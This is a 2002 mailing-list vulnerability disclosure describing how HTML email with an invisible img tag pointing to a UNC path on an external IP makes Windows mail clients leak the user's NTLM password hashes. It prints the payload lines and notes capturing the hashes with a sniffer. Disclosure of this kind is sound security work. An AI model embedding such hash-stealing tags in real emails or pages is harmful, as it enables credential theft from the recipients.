Hijacking the hashes : multiple windows mail clients vulnerability

[<overclocking_a_la_abuela () hotmail com>]

Hi men !

Some time ago, Windows 2000 was kicked with a vulnerability that allowed 
an attacker to force a telnet session  to an external server. The telnet 
client tried to validate sending the hashes of the user... This could be 
exploited with a simple javascript "open.window("telnet://<IP>")" in an 
HTML formatted mail or with the very rude method of a link pointing to an 
URL using telnet scheme.
Microsoft patched it and now windows 2000 asks you if you want to send 
your pawword,.... emmm, no thanks !  ;-)

So, what about if there was another  method to force a user on a windows 
box to send you his hashes, without his knowledge, without using any 
interactive method, non javascript, non activeX, non some lame social 
engeneering technique... only HTML ?

Here you have another flaw that is present on almost every Windows box 
that can be exploited to obtain the user´s password´s challenge/response 
hashes.
Everybody knows that if a windows machine wants to access a SMB resource, 
always tries to connect first using the password of the user logued in. 
This "feature" is transparent to the user, so he never gets prompted to 
something like : "WARNING: you are about to send your password...". 

OK, that`s what we have found :
simply send a html formatted mail message that includes this code :

1st) <img src="file://\\\\external_IP\\resource"> or 2nd) <img 
src="\\\\external_IP\\resource">.

To make it "invisible" reduce the size of the "image" to the min.

On mail clients that works with IE engine both methods seems to work : 
outlook, outlook express,...

Any other web mail system  when using IE will  be forced to send hashes ( 
tested with Outlook Web Access, Hotmail, ... ) unless the mail web server 
does any kind of filtering on HTML code.

On Eudora  first technique will work only if IE is selected as viewer and 
the second one will work on both cases.

An attacker only have to send you an e-mail as described before an wait 
for your response with a network monitor ( LC3 in sniffer mode works fine 
for this purpose ).

Windows 2000 SP2 fully patched and  will be assimilated unless you force 
strong authentication ( not  on default installation ).

Of course a tightened firewall denying outgoing trafic through port TCP 
139 will prevent this but the problem is there and Windows users are 
exposed to the most easy way to stole their hashes : by e-mail.

This vulnerability has been found by :

HUGO VÁZQUEZ CARAMÉS and TONI CORTÉS.
www.infohacking.com 2002
Barcelona
SPAIN